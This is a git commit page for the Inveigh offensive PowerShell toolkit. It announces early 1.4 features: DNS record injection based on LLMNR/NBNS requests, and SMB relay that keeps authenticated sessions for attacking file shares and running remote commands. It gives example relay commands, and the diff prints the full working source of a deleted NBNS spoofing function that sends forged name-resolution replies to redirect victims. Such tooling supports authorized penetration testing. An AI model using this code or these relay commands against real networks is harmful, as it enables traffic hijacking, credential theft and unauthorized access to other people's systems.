diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2018-02-19 23:36:13 -0500 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2018-02-19 23:36:13 -0500 |
| commit | 43edf71b54567698d24d7c44ce3410120841b53a (patch) | |
| tree | 978bae559d6ec42f76c1168f125704132e755b59 /Extras/Send-NBNSResponse.ps1 | |
| parent | 32550b99a7f8e8006f16d185e9d6f40fe4b3d9ea (diff) | |
| download | Inveigh-43edf71b54567698d24d7c44ce3410120841b53a.tar.gz Inveigh-43edf71b54567698d24d7c44ce3410120841b53a.zip | |
Inveigh 1.4 dev
This is an early version of Inveigh 1.4. There is probably alot that is
broken.
Inveigh:
1. Invoke-DNSUpdate integration - Inveigh will attempt to inject DNS
records if the same LLMNR/NBNS request is observed from multiple
systems. The goal is to find requests that could be valid in other
subnets and leverage them through DNS. This version requires that
Inveigh is running with a domain auth user context.
2. Reworked output system and formating.
3. hmm...I forget.
Inveigh Relay:
1. New attack with Invoke-TheHash integration - In addition to that
standard psexec style attack, Inveigh Relay now has the ability to
create and maintain authenticated priv and unpriv SMB2 sessions. These
sessions can be used by Invoke-SMBClient (attack file shares) and
Invoke-SMBExec.
Invoke-InveighRelay -Attack session -Target 10.10.10.10
wait for relay
Get-Inveigh -session
Invoke-SMBClient -Session 0 -Source \\10.10.10.10\share
2. Multitarget - Inveigh Relay will now accept an array of targets. As
relay attempts come in, Inveigh Relay will attempt to select the best
target (still needs work).
3. SMB signing check for targets on startup.
4. Reworked output system and formating.
I'm temporarily housing newer versions of Invoke-DNSUpdate,
Invoke-SMBClient, and Invoke-SMBExec here. They need to be imported into
the same powershell session for integration to work. There is also
probably a lot broken with these.
Diffstat (limited to 'Extras/Send-NBNSResponse.ps1')
| -rw-r--r-- | Extras/Send-NBNSResponse.ps1 | 105 |
1 files changed, 0 insertions, 105 deletions
diff --git a/Extras/Send-NBNSResponse.ps1 b/Extras/Send-NBNSResponse.ps1 deleted file mode 100644 index 3d5ed02..0000000 --- a/Extras/Send-NBNSResponse.ps1 +++ /dev/null @@ -1,105 +0,0 @@ - -function Send-NBNSResponse -{ -<# -.SYNOPSIS -Send-NBNSResponse sends a crafted NBNS response packet to a specific target. For name resolution to be successful, -the specified TargetIP, Hostname, and TransactionID must match a very (very very) recent NBNS request. You must -have an external method (wireshark,etc) of viewing the required NBNS request fields for traffic on the target -subnet. The odds of pulling this attack off manually are slim due to the narrow response window. I've only been -able to get it to work manually by watching tshark with the the transaction ID being listed in the output. -Ideally, this function would be fed by another script. - -.PARAMETER Hostname -Default = WPAD: Specify a hostname for NBNS spoofing. - -.PARAMETER NBNSTTL -Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. - -.PARAMETER SendPort -Default = 137: Specify a source port for the NBNS response. - -.PARAMETER SpooferIP -IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system -other than the function host. - -.PARAMETER TargetIP -IP address to target for the NBNS response. - -.PARAMETER TransactionID -NBNS transaction ID that matches the transaction from the NBNS request. - -.EXAMPLE -Send-NBNSResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e - -.LINK -https://github.com/Kevin-Robertson/Inveigh -#> - - -[CmdletBinding()] -param -( -[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="", -[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="", -[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="", -[parameter(Mandatory=$true)][String]$Hostname = "", -[parameter(Mandatory=$false)][Int]$SendPort="137", -[parameter(Mandatory=$false)][Int]$NBNSTTL="165", -[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter -) - -if ($invalid_parameter) -{ - throw "$($invalid_parameter) is not a valid parameter." -} - -if(!$SpooferIP) -{ - $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) -} - -$Hostname = $Hostname.ToUpper() - -$hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41, - 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00 - -$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname) -$hostname_encoded = [System.BitConverter]::ToString($hostname_encoded) -$hostname_encoded = $hostname_encoded.Replace("-","") -$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded) -$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) -[Array]::Reverse($NBNS_TTL_bytes) -$Transaction_ID_encoded = $TransactionID.Insert(2,'-') -$Transaction_ID_bytes = $Transaction_ID_encoded.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - -for($i=0; $i -lt $hostname_encoded.Count; $i++) -{ - - if($hostname_encoded[$i] -gt 64) - { - $hostname_bytes[$i] = $hostname_encoded[$i] + 10 - } - else - { - $hostname_bytes[$i] = $hostname_encoded[$i] + 17 - } - -} - -$NBNS_response_packet = $Transaction_ID_bytes + - 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + - $hostname_bytes + - 0x00,0x20,0x00,0x01 + - $NBNS_TTL_bytes + - 0x00,0x06,0x00,0x00 + - ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + - 0x00,0x00,0x00,0x00 - -$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort) -$destination_IP = [System.Net.IPAddress]::Parse($TargetIP) -$destination_point = New-Object Net.IPEndpoint($destination_IP,137) -$send_socket.Connect($destination_point) -$send_socket.Send($NBNS_response_packet,$NBNS_response_packet.Length) -$send_socket.Close() -}
\ No newline at end of file |